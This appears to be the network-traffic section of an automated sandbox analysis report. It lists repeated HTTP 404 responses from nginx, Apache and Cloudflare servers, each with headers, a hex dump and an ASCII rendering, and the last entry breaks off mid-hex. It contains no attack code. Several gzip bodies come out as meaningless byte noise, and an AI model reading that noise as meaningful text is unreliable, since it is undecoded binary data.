                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:54:25 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:54:28 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:54:30 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Nov 2024 12:54:33 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-litespeed-tag: 3d9_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://tenmyk.shop/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HkunI7DZZ%2FqdJCgZNv95YCgaZuMrjcFlpnDSXFBAxX7vXbaTCd%2FDTxBG7V2EetXO7f4qxUP63pn1TNX5OJbcFihpCgzrW9rwuocCfToDH2EnoRijBYiXsBnoZo7N9nBjCRo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e481d4a0fe16c80-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1144&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 63 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 1a 69 73 9c 38 f6 f3 f8 57 60 5c d3 86 89 a0 a1 0f b7 4d 87 4c 66 72 ec 51 99 71 2a 4e 6a 6b cb 76 a5 d4 e8 41 cb 06 89 95 44 1f e9 e1 bf 6f 09 fa a0 0f c7 5e ef ce 3a 95 04 9e de ad 77 49 f8 e5 f1 db cb 37 9f ff f9 f1 9d 31 56 59 fa ea e8 a5 fe cf 48 31 4b 42 13 98 f3 e5 ca 34 72 01 31 9d 85 26 4f 02 63 ac 54 2e 83 76 9b 27 b9 9b 41 9b c9 13 d3 88 52 2c 65 68 a6 1c 13 ca 12 47 52 05 06 e3 ce 9d 34 35 3b c0 e4 d5 d1 0f 2f 33 50 d8 88 c6 58 48 50 a1 f9 e5 f3 7b e7 dc 34 da 7a 25 a5 ec de 10 90 86 66 2e 78 4c 53 30 8d b1 80 38 34 b5 ac a0 dd 4e b2 3c 71 b9 48 da b3 98 b5 Data Ascii: dc2is8W`\MLfrQq*NjkvADo^:wI71VYH1KB4r1&OcT.v'AR,ehGR45;/3PXHP{4z%f.xLS084N<qH
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HMnA4r2nXw6WlQpK8dbcV7253z3POErnGIEdYdJaDKXSJuoUByxnIFKx12Ou4g8YKXaQDPpDjCNwNKRhZGtKREBoBxmlZZQ0cL6lvFs%2BVhof4OoW2Yj67GrvYgLeMDPBgKrHrQmS9hVk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e481de6986e6b2f-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1640&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae c2 14 15 a1 89 7e 6c 39 45 f0 88 f1 d5 70 8f 72 32 39 3b 3d bb 88 a0 e4 26 97 2a 84 d3 61 b5 81 a1 fb f6 09 46 70 df e1 e1 70 7e fe 72 76 32 7f 9c 03 f4 49 ec 44 60 d4 8a b4 86 35 Data Ascii: 2c8To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2ID`5
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 12:55:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKdEhhiEIZicQifgDUOwgPYOTYRYZa8iEhqSlu6dC9zytsaFlLeQcYQx0KVvEkpAKydGZMUE%2B1JRbJNv%2ByP5kF4z5H7NiKjhTYaL7WTD2fNxQg90DrPq17jY0ucwnIjJYr5dieAfqL18"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e481df6896f0072-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1510&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e 